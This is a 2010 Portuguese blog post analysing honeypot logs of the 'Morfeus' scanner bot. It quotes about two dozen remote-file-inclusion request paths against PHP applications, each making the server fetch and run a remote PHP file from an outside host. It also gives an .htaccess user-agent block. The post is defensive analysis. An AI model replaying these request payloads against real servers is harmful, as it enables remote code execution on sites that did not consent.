quarta-feira, 1 de dezembro de 2010

Morfeus - novo bot scaner de vulnerabilidades em web servers

Hoje pela manhã (1/12/2010) fui analisar os logs do meu Honeypot – breve estarei postando um post sobre honeypot - e para a minha surpresa um novo scanear de vulnerabilidade esta rodando pelo mundo. Este novo scanear é chamado de “Morfeus Fucking Scanner”. Até onde pude verificar ele é um bot que busca por vulnerabilidades em códigos em PHP. Abaixo segue o log de outro servidor com honeypot:

/admin/business_inc/saveserver.php?thisdir=http://203.206.169.35/1.gif?/
/admin/business_inc/saveserver.php?thisdir=http://makina.org/sugarfree/1.gif?/
/board/include/bbs.lib.inc.php?site_path=http://203.206.169.35/1.gif?/
/board/rgboard/include/bbs.lib.inc.php?site_path=http://203.206.169.35/1.gif?/
/cacti/include/config_settings.php?config[include_path]=http://makina.org/sugarfree/1.gif?/
/calendar/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/calendar/tools/send_reminders.php?noSet=0&includedir=http://64.15.76.197/modules/1.gif?/
/cal/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/components/com_facileforms/facileforms.frame.php?ff_compath=http://203.206.169.35/1.gif?/
/dotproject/includes/db_adodb.php?baseDir=http://203.206.169.35/1.gif?/
/dotproject/includes/db_adodb.php?baseDir=http://makina.org/sugarfree/1.gif?/
/ical/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.206.169.35/1.gif?/
/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://makina.org/sugarfree/1.gif?/
/index.php?id=http://makina.org/sugarfree/1.gif?/
/index.php?option=com_custompages&cpage=http://203.206.169.35/1.gif?/
/joomla/components/com_facileforms/facileforms.frame.php?ff_compath=http://203.206.169.35/1.gif?/
/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.206.169.35/1.gif?/
//?mosConfig_absolute_path=http://203.206.169.35/1.gif?/
/project/includes/db_adodb.php?baseDir=http://203.206.169.35/1.gif?/
/projects/includes/db_adodb.php?baseDir=http://203.206.169.35/1.gif?/
/rgboard/include/bbs.lib.inc.php?site_path=http://203.206.169.35/1.gif?/
/user/soapCaller.bs
/webcalendar/tools/send_reminders.php?includedir=http://makina.org/sugarfree/1.gif?/
/webcalendar/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/webcalendar/tools/send_reminders.php?noSet=0&includedir=http://64.15.76.197/modules/1.gif?/

O arquivo 1.gif que o atacante inclui é um script em PHP fazendo um echo:

echo ("Morfeus hacked you");

Para quem usa Apache pode “bloquear” o Morfeus adicionando 3 linhas no arquivo .htaccess:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^Morfeus
RewriteRule ^.*$ – [F]

Quando o Apache analisar o Agente sendo como Morfeus ele barra a requisição. O problema é que se o desenvolvedor mudar o Agente para outro nome, o que é super fácil de fazer, o Morfeus burlara essa defesa no Apache.

by Osvaldo H Peixoto


Postado por às

Nenhum comentário:

Postar um comentário

Assinar: Postar comentários (Atom)